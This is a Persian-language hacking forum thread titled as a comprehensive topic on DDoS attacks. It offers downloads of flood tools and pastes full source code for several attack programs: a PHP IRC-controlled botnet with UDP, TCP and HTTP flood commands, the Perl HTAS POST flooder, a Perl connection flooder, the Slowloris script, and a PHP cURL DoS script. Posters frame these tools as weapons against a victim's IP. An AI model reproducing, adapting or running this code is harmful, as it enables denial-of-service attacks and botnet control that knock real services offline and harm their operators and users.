SpareNet Servers Advertising & Link Exchange

اطلاعیه

بستن
هیچ اطلاعیه ای هنوز ایجاد نشده است .

تاپیک جامع حملات D-Dos

بستن
X
 
  • فیلتر
  • زمان
  • نمایش
پاک کردن همه
نوشته‌های جدید

  • تاپیک جامع حملات D-Dos

    باسلام.
    به درخواست دوستان.
    این برنامه H.I.O.C_D یکی از برنامه ها قدرت منده Ddos است.نیاز به سرور مجازی یا VPS دارد.

    [php]http://uplod.ir/qe8nin6dcfrt/H.O.I.C_D-Doser.zip.htm[/php]

    این یکی برنامه که خودم نوشتم و نیازی به VPS نیست.IP قربانی رو قرار میدین.

    [align=CENTER][/align]
    [php]http://uplod.ir/gm0gpnwrs6mp/Love_War.rar.htm[/php]
    یاحق:136:

  • #2
    RE: تاپیک جامع حملات D-Dos

    Php D-doser

    [php]<?php
    /*

    Simple PHP DDOSER

    //EDIT HERE!!!
    $server="your_irc_Server";
    $Port="6667";
    $nick="slave-";$willekeurig;
    $willekeurig=mt_rand(0,3);
    $nicknummer=mt_rand(100000,999999);
    $Channel="#yourchannel";
    $Channelpass="yourpwd";
    $msg="Farewell.";
    //STOP EDITING!

    set_time_limit(0);
    $loop = 0; $verbonden = 0;
    $verbinden = fsockopen($server, $Port);

    while ($read = fgets($verbinden,512)) {

    $read = str_replace("\n","",$read); $read = str_replace("\r","",$read);
    $read2 = explode(" ",$read);

    if ($loop == 0) {
    fputs($verbinden,"nick $nick$nicknummer\n\n");
    fputs($verbinden,"USER cybercrime 0 * :woopie\n\n");
    }

    if ($read2[0] == "PING") { fputs($verbinden,'PONG '.str_replace(':','',$read2[1])."\n"); }

    if ($read2[1] == 251) {
    fputs($verbinden,"join $Channel $Channelpass\n");
    $verbonden++;
    }

    //READING AREA
    if (eregi("bot-op",$read)) {
    fputs($verbinden,"mode $Channel +o $read2[4]\n");
    }


    if (eregi("bot-deop",$read)) {
    fputs($verbinden,"mode $Channel -o $read2[4]\n");
    }

    if (eregi("bot-quit",$read)) {
    fputs($verbinden,"quit :$msg\n\n");
    break;
    }

    if (eregi("bot-join",$read)) {
    fputs($verbinden,"join $read2[4]\n");
    }

    if (eregi("bot-part",$read)) {
    fputs($verbinden,"part $read2[4]\n");
    }


    if (eregi("ddos-udp",$read)) {
    fputs($verbinden,"privmsg $Channel :ddos-udp - started udp flood - $read2[4]\n\n");
    $fp = fsockopen("udp://$read2[4]", 500, $errno, $errstr, 30);
    if (!$fp)
    {
    //echo "$errstr ($errno)<br>\n"; //troep
    exit;
    }
    else
    {
    $char = "a";
    for($a = 0; $a < 9999999999999; $a++)
    $data = $data.$char;

    if(fputs ($fp, $data) )
    fputs($verbinden,"privmsg $Channel :udp-ddos - packets sended.\n\n");
    else
    fputs($verbinden,"privmsg $Channel :udp-ddos - <error> sending packets.\n\n");
    }
    }

    if (eregi("ddos-tcp",$read)) {
    fputs($verbinden,"part $read2[4]\n");
    fputs($verbinden,"privmsg $Channel :tcp-ddos - flood $read2[4]:$read2[5] with $read2[6] sockets.\n\n");
    $server = $read2[4];
    $Port = $read2[5];

    for($sockets = 0; $sockets < $read2[6]; $sockets++)
    {
    $verbinden = fsockopen($server, $Port);
    }
    }

    if (eregi("ddos-http",$read)) {
    fputs($verbinden,"part $read2[4]\n");
    fputs($verbinden,"privmsg $Channel :ddos-http - http://$read2[4]:$read2[5] $read2[6] times\n\n");
    $Webserver = $read2[4];
    $Port = $read2[5];

    $Aanvraag = "GET / HTTP/1.1\r\n";
    $Aanvraag .= "Accept: */*\r\n";
    $Aanvraag .= "Accept-Language: nl\r\n";
    $Aanvraag .= "Accept-Encoding: gzip, deflate\r\n";
    $Aanvraag .= "User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1)\r\n";
    $Aanvraag .= "Host: $read2[4]\r\n";
    $Aanvraag .= "Connection: Keep-Alive\r\n\r\n";

    for($Aantal = 0; $Aantal < $read2[6]; $Aantal++)
    {
    $DoS = fsockopen($Webserver, $Port);
    fwrite($DoS, $Aanvraag);
    fclose($DoS);
    }
    }
    $loop++;

    }
    ?>[/php]
    [hr]
    Perl Ddoser Serv

    [php]#!usr/bin/perl
    #please dont edit this without including this.
    #HTAS project --> Xer0X
    use IO::Socket::INET;
    print "Welcome to the Hyper Text Assault Script, or HTAS v1.0b";
    while (!$ARGV[0]) {
    &usage; #change to usage subroutine
    }
    $x=1;
    $gz00=1;
    $Host = "$ARGV[0]";
    $Port = 80;

    print "\n Please enter...\n";
    print "\n Path: (NOT SITE!):";
    $url = <STDIN>;
    chop($url);
    print "First Form Name:";
    $f1n = <STDIN>;
    chop($f1n);
    print "\n First Form Value:";
    $f1v = <STDIN>;
    chop($f1v);
    print "\n amount of forms left:";
    $amt = <STDIN>;
    &aform(amt);
    print "\n";
    $PostGet = '';

    ###Subroutines
    sub usage { #explanation of HTAS usage
    print "Usage{\n";
    print "Modules used:\n";
    print "IO::Socket::INET\n";
    print "-"x 10 . "\n";
    print "htas.pl <host>\n";
    print "Testing connection...\n";
    my $sock = IO::Socket::INET->new( PeerAddr => 'google.com', #yes i know not needed
    PeerPort => 80,
    Prot => 'tcp',
    )|| print "\nConnection Nonfunctional or website down.\n";
    print "Connection to test website (Google.com:80) successful.\n";
    print "Connection verified.\n" . ":>"x 40 . "\n";
    print "Hyper Text Assault Script version 1.0\n";
    print "This monster created by Xer0X\n}\n";
    exit;
    }

    sub aform { #form creation subroutine
    $gzo = 0; #gzo = ground zer0
    while ($gzo != $amt) {
    print "Form " . $gzo . " name:";
    $bfn=<STDIN>;
    chop($bfn);
    $bfn=$bfn . $gzo;
    chop($bfn);
    print "Form " . $gzo . " value:";
    $bfv = <STDIN>;
    chop($bfv);
    $bfv = $bfv . $gzo;
    chop($bfv);
    $PostGet = "$PostGet" . "&" . "$bfn" . "=" . "$bfv";
    $gzo++;
    }
    &destroy;
    }

    sub printget {
    print "\n\n\n$PostGet";
    }

    sub destroy { #let us begin

    while($x) {
    print "$gz00";
    $gz00++;
    my $sock = IO::Socket::INET->new( PeerAddr => "$Host",
    PeerPort => 80,
    Proto => "tcp",
    );
    &destroy unless $sock;
    print $sock "POST $url?$f1n=$f1v";
    print $sock "Host: $host\n";
    print $sock "Accept: text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5\n";
    print $sock "Referer: $host\n";
    print $sock "Accept-Language: en-us\n";
    print $sock "Content-Type: application/x-www-form-urlencoded\n";
    print $sock "Accept-Encoding: gzip, deflate\n";
    print $sock "User-Agent: Mozilla/5.0 (BeOS; U; BeOS X.6; sp-ME; rv:1.7.8) Gecko/19500101 Firefox/0.0.beta3\n";
    print $sock "Connection: Keep-Alive\n";
    print $sock "Cache-Control: no-cache\n";
    print $sock "Content-Length: $lrg\n\n";
    print $sock "$PostGet\n";
    close($sock);
    }
    } [/php]

    نظر


    • #3
      RE: تاپیک جامع حملات D-Dos

      [php]#!/usr/bin/perl
      # <--PRIV8-->
      #coded for Lin And Win OS's For attacking
      use IO::Socket;
      print q(



      Usage : Perl named.pl <host> <port>
      Examp : Perl ddoser.pl 127.0.0.1 80
      );
      my $host= shift;
      my $port= shift;
      if ($host!=null){
      printf ("\n\t\t . . . . . . Attack Started . . . . . . .\n\n\n");
      sleep (2);
      for ($i=0; ;$i--)
      {
      $len = length $form;
      $get = IO::Socket::INET->new( Proto => "tcp", PeerAddr => "$host", PeerPort => "$port") || redo;
      syswrite STDOUT, ".";
      }
      }
      else
      {exit(0);}[/php]
      [hr]
      [php]#!/usr/bin/perl -w
      use strict;
      use IO::Socket::INET;
      use IO::Socket::SSL;
      use Getopt::Long;
      use Config;

      $SIG{'PIPE'} = 'IGNORE'; #Ignore broken pipe errors

      print <<EOTEXT;
      
      CCCCCCCCCCOOCCOOOOO888\@8\@8888OOOOCCOOO888888888\ @\@\@\@\@\@\@\@\@8\@8\@\@\@\@888OOCooocccc::::
      CCCCCCCCCCCCCCCOO888\@888888OOOCCCOOOO888888888888 \@88888\@\@\@\@\@\@\@888\@8OOCCoococc:::
      CCCCCCCCCCCCCCOO88\@\@888888OOOOOOOOOO8888888O8888 8888O8O8OOO8888\@88\@\@8OOCOOOCoc::
      CCCCooooooCCCO88\@\@8\@88\@888OOOOOOO88888888888OO OOOOOOOOCCCCCOOOO888\@8888OOOCc::::
      CooCoCoooCCCO8\@88\@8888888OOO888888888888888888OO OOCCCooooooooCCOOO8888888Cocooc:
      ooooooCoCCC88\@88888\@888OO8888888888888888O8O8888 OOCCCooooccccccCOOOO88\@888OCoccc
      ooooCCOO8O888888888\@88O8OO88888OO888O8888OOOO8888 8OCocoococ::ccooCOO8O888888Cooo
      oCCCCCCO8OOOCCCOO88\@88OOOOOO8888O888OOOOOCOO88888 O8OOOCooCocc:::coCOOO888888OOCC
      oCCCCCOOO88OCooCO88\@8OOOOOO88O888888OOCCCCoCOOO88 88OOOOOOOCoc::::coCOOOO888O88OC
      oCCCCOO88OOCCCCOO8\@\@8OOCOOOOO8888888OoocccccoCO8 O8OO88OOOOOCc.:ccooCCOOOO88888OO
      CCCOOOO88OOCCOOO8\@888OOCCoooCOO8888Ooc::...::coOO 88888O888OOo:cocooCCCCOOOOOO88O
      CCCOO88888OOCOO8\@\@888OCcc:::cCOO888Oc..... ....cCOOOOOOOOOOOc.:cooooCCCOOOOOOOOO
      OOOOOO88888OOOO8\@8\@8Ooc:.:...cOO8O88c. . .coOOO888OOOOCoooooccoCOOOOOCOOOO
      OOOOO888\@8\@88888888Oo:. . ...cO888Oc.. OOOOOOOOOCCoocooCoCoCOOOOOOOO
      COOO888\@88888888888Oo:. .O8888C: .oCOo. ...cCCCOOOoooooocccooooooooCCCOO
      CCCCOO888888O888888Oo. .o8Oo. .cO88Oo: :. .:..ccoCCCooCooccooccccoooooCCCC
      coooCCO8\@88OO8O888Oo:::... .. :cO8Oc. . ..... :. .:ccCoooooccoooocccccooooCCC
      :ccooooCO888OOOO8OOc..:...::. .co8\@8Coc::.. .... ..:cooCooooccccc::::ccooCCooC
      .:::coocccoO8OOOOOOC:..::....coCO8\@8OOCCOc:... ....:ccoooocccc:::::::::cooooooC
      ....::::ccccoCCOOOOOCc......CO8\@8\@88OCCCoccccc::c::.Ccc:::cccc:..::::coooooo
      .......::::::::cCCCCCCoocc:cO888\@8888OOOOCOOOCooc c::.:cocc::cc:::...:::coocccccc
      ...........:::..:coCCCCCCCO88OOOO8OOOCCooCCCooccc: :::ccc::::::.......:ccocccc:co
      .............::....CCoooooCOOCCOCCCoccococc:::::coc::::....... ...:::cccc:cooo
      ..... ............. .coocoooCCoco:::ccccccc:::ccc::.......... ....:::cc::::coC
      . . ... .... .. .:cccoCooc:.. ::cccc:::c:.. ......... ......::::c:cccco
      . .. ... .. .. .. ..:...:cooc::cccccc:..... ......... .....:::::ccoocc
      . . .. ..::cccc:.::ccoocc:. ........... .. . ..:::.:::::::ccco
      
      Welcome to Slowloris - the low bandwidth, yet greedy and poisonous HTTP client
      
      EOTEXT

      my ( $host, $port, $sendhost, $shost, $test, $version, $timeout, $connections );
      my ( $cache, $httpready, $method, $ssl, $rand, $tcpto );
      my $result = GetOptions(
      'shost=s' => \$shost,
      'dns=s' => \$host,
      'httpready' => \$httpready,
      'num=i' => \$connections,
      'cache' => \$cache,
      'port=i' => \$port,
      'https' => \$ssl,
      'tcpto=i' => \$tcpto,
      'test' => \$test,
      'timeout=i' => \$timeout,
      'version' => \$version,
      );

      if ($version) {
      print "Version 0.7\n";
      exit;
      }

      unless ($host) {
      print "Usage:\n\n\tperl $0 -dns [www.example.com] -options\n";
      print "\n\tType 'perldoc $0' for help with options.\n\n";
      exit;
      }

      unless ($port) {
      $port = 80;
      print "Defaulting to port 80.\n";
      }

      unless ($tcpto) {
      $tcpto = 5;
      print "Defaulting to a 5 second tcp connection timeout.\n";
      }

      unless ($test) {
      unless ($timeout) {
      $timeout = 100;
      print "Defaulting to a 100 second re-try timeout.\n";
      }
      unless ($connections) {
      $connections = 1000;
      print "Defaulting to 1000 connections.\n";
      }
      }

      my $usemultithreading = 0;
      if ( $Config{usethreads} ) {
      print "Multithreading enabled.\n";
      $usemultithreading = 1;
      use threads;
      use threads::shared;
      }
      else {
      print "No multithreading capabilites found!\n";
      print "Slowloris will be slower than normal as a result.\n";
      }

      my $packetcount : shared = 0;
      my $failed : shared = 0;
      my $connectioncount : shared = 0;

      srand() if ($cache);

      if ($shost) {
      $sendhost = $shost;
      }
      else {
      $sendhost = $host;
      }
      if ($httpready) {
      $method = "POST";
      }
      else {
      $method = "GET";
      }

      if ($test) {
      my @times = ( "2", "30", "90", "240", "500" );
      my $totaltime = 0;
      foreach (@times) {
      $totaltime = $totaltime + $_;
      }
      $totaltime = $totaltime / 60;
      print "This test could take up to $totaltime minutes.\n";

      my $delay = 0;
      my $working = 0;
      my $sock;

      if ($ssl) {
      if (
      $sock = new IO::Socket::SSL(
      PeerAddr => "$host",
      PeerPort => "$port",
      Timeout => "$tcpto",
      Proto => "tcp",
      )
      )
      {
      $working = 1;
      }
      }
      else {
      if (
      $sock = new IO::Socket::INET(
      PeerAddr => "$host",
      PeerPort => "$port",
      Timeout => "$tcpto",
      Proto => "tcp",
      )
      )
      {
      $working = 1;
      }
      }
      if ($working) {
      if ($cache) {
      $rand = "?" . int( rand(99999999999999) );
      }
      else {
      $rand = "";
      }
      my $primarypayload =
      "GET /$rand HTTP/1.1\r\n"
      . "Host: $sendhost\r\n"
      . "User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 5.1; Trident/4.0; .NET CLR 1.1.4322; .NET CLR 2.0.503l3; .NET CLR 3.0.4506.2152; .NET CLR 3.5.30729; MSOffice 12)\r\n"
      . "Content-Length: 42\r\n";
      if ( print $sock $primarypayload ) {
      print "Connection successful, now comes the waiting game...\n";
      }
      else {
      print
      "That's odd - I connected but couldn't send the data to $host:$port.\n";
      print "Is something wrong?\nDying.\n";
      exit;
      }
      }
      else {
      print "Uhm... I can't connect to $host:$port.\n";
      print "Is something wrong?\nDying.\n";
      exit;
      }
      for ( my $i = 0 ; $i <= $#times ; $i++ ) {
      print "Trying a $times[$i] second delay: \n";
      sleep( $times[$i] );
      if ( print $sock "X-a: b\r\n" ) {
      print "\tWorked.\n";
      $delay = $times[$i];
      }
      else {
      if ( $SIG{__WARN__} ) {
      $delay = $times[ $i - 1 ];
      last;
      }
      print "\tFailed after $times[$i] seconds.\n";
      }
      }

      if ( print $sock "Connection: Close\r\n\r\n" ) {
      print "Okay that's enough time. Slowloris closed the socket.\n";
      print "Use $delay seconds for -timeout.\n";
      exit;
      }
      else {
      print "Remote server closed socket.\n";
      print "Use $delay seconds for -timeout.\n";
      exit;
      }
      if ( $delay < 166 ) {
      print <<EOSUCKS2BU;
      Since the timeout ended up being so small ($delay seconds) and it generally
      takes between 200-500 threads for most servers and assuming any latency at
      all... you might have trouble using Slowloris against this target. You can
      tweak the -timeout flag down to less than 10 seconds but it still may not
      build the sockets in time.
      EOSUCKS2BU
      }
      }
      else {
      print
      "Connecting to $host:$port every $timeout seconds with $connections sockets:\n";

      if ($usemultithreading) {
      domultithreading($connections);
      }
      else {
      doconnections( $connections, $usemultithreading );
      }
      }

      sub doconnections {
      my ( $num, $usemultithreading ) = @_;
      my ( @first, @sock, @working );
      my $failedconnections = 0;
      $working[$_] = 0 foreach ( 1 .. $num ); #initializing
      $first[$_] = 0 foreach ( 1 .. $num ); #initializing
      while (1) {
      $failedconnections = 0;
      print "\t\tBuilding sockets.\n";
      foreach my $z ( 1 .. $num ) {
      if ( $working[$z] == 0 ) {
      if ($ssl) {
      if (
      $sock[$z] = new IO::Socket::SSL(
      PeerAddr => "$host",
      PeerPort => "$port",
      Timeout => "$tcpto",
      Proto => "tcp",
      )
      )
      {
      $working[$z] = 1;
      }
      else {
      $working[$z] = 0;
      }
      }
      else {
      if (
      $sock[$z] = new IO::Socket::INET(
      PeerAddr => "$host",
      PeerPort => "$port",
      Timeout => "$tcpto",
      Proto => "tcp",
      )
      )
      {
      $working[$z] = 1;
      $packetcount = $packetcount + 3; #SYN, SYN+ACK, ACK
      }
      else {
      $working[$z] = 0;
      }
      }
      if ( $working[$z] == 1 ) {
      if ($cache) {
      $rand = "?" . int( rand(99999999999999) );
      }
      else {
      $rand = "";
      }
      my $primarypayload =
      "$method /$rand HTTP/1.1\r\n"
      . "Host: $sendhost\r\n"
      . "User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 5.1; Trident/4.0; .NET CLR 1.1.4322; .NET CLR 2.0.503l3; .NET CLR 3.0.4506.2152; .NET CLR 3.5.30729; MSOffice 12)\r\n"
      . "Content-Length: 42\r\n";
      my $handle = $sock[$z];
      if ($handle) {
      print $handle "$primarypayload";
      if ( $SIG{__WARN__} ) {
      $working[$z] = 0;
      close $handle;
      $failed++;
      $failedconnections++;
      }
      else {
      $packetcount++;
      $working[$z] = 1;
      }
      }
      else {
      $working[$z] = 0;
      $failed++;
      $failedconnections++;
      }
      }
      else {
      $working[$z] = 0;
      $failed++;
      $failedconnections++;
      }
      }
      }
      print "\t\tSending data.\n";
      foreach my $z ( 1 .. $num ) {
      if ( $working[$z] == 1 ) {
      if ( $sock[$z] ) {
      my $handle = $sock[$z];
      if ( print $handle "X-a: b\r\n" ) {
      $working[$z] = 1;
      $packetcount++;
      }
      else {
      $working[$z] = 0;
      #debugging info
      $failed++;
      $failedconnections++;
      }
      }
      else {
      $working[$z] = 0;
      #debugging info
      $failed++;
      $failedconnections++;
      }
      }
      }
      print
      "Current stats:\tSlowloris has now sent $packetcount packets successfully.\nThis thread now sleeping for $timeout seconds...\n\n";
      sleep($timeout);
      }
      }

      sub domultithreading {
      my ($num) = @_;
      my @thrs;
      my $i = 0;
      my $connectionsperthread = 50;
      while ( $i < $num ) {
      $thrs[$i] =
      threads->create( \&doconnections, $connectionsperthread, 1 );
      $i += $connectionsperthread;
      }
      my @threadslist = threads->list();
      while ( $#threadslist > 0 ) {
      $failed = 0;
      }
      }[/php]
      [hr]
      [php]<?php
      //Consol Based CURL Dos
      // By: Mad-Hatter
      // TheHackers.info
      //use ?x=9000&target=google.com
      // Target = Target
      // x = Connections
      ///////////////////////////////////

      function MakeArrays($count, $url)
      {
      echo "[+] Preparing Arrays\n";
      $victim = array();
      for($x = 0; $x <= $count; $x++)
      {
      $victim[$x] = $url;
      }

      echo "[+] DONE Preparing Arrays ({$count})\n";
      return $victim;
      }

      if(!isset($_REQUEST['target']) || empty($_REQUEST['target']))
      die("[-] ***** go back and put in valid params.\n");

      $victim = MakeArrays(trim($_REQUEST['x']), trim($_REQUEST['target']));

      echo "[+] Preparing cURL
      ";
      $mh = curl_multi_init();

      foreach ($victim as $i => $url)
      {
      $c[$i] = curl_init($url);
      curl_setopt($c[$i], CURLOPT_RETURNTRANSFER, 1);
      curl_multi_add_handle($mh, $c[$i]);
      }
      echo "[+] DONE Preparing cURL
      ";
      echo "[+] Starting cURL Attacks
      ";
      do
      {
      $n = curl_multi_exec($mh, $active);
      } while ($active);
      echo "[+] Attacks Completed
      ";
      echo "[+] Waiting for Server buffer.
      ";
      foreach ($victim as $i => $url)
      {
      $res[$i]=curl_multi_getcontent($c[$i]);
      curl_close($c[$i]);
      }
      echo "[+] DoS done?\n";

      ?>[/php]

      نظر


      • #4
        RE: تاپیک جامع حملات D-Dos

        نوشته اصلی توسط Love War
        باسلام.
        به درخواست دوستان.
        این برنامه H.I.O.C_D یکی از برنامه ها قدرت منده Ddos است.نیاز به سرور مجازی یا VPS دارد.

        [php]http://uplod.ir/qe8nin6dcfrt/H.O.I.C_D-Doser.zip.htm[/php]

        این یکی برنامه که خودم نوشتم و نیازی به VPS نیست.IP قربانی رو قرار میدین.

        [align=CENTER][/align]
        [php]http://uplod.ir/gm0gpnwrs6mp/Love_War.rar.htm[/php]
        یاحق:136:


        age mishe yekam tozih bedin dar moredesh
        ><><><><><><><><>><NaMe Of GoD><><><><><><><><><

        نظر

        صبر کنید ..
        X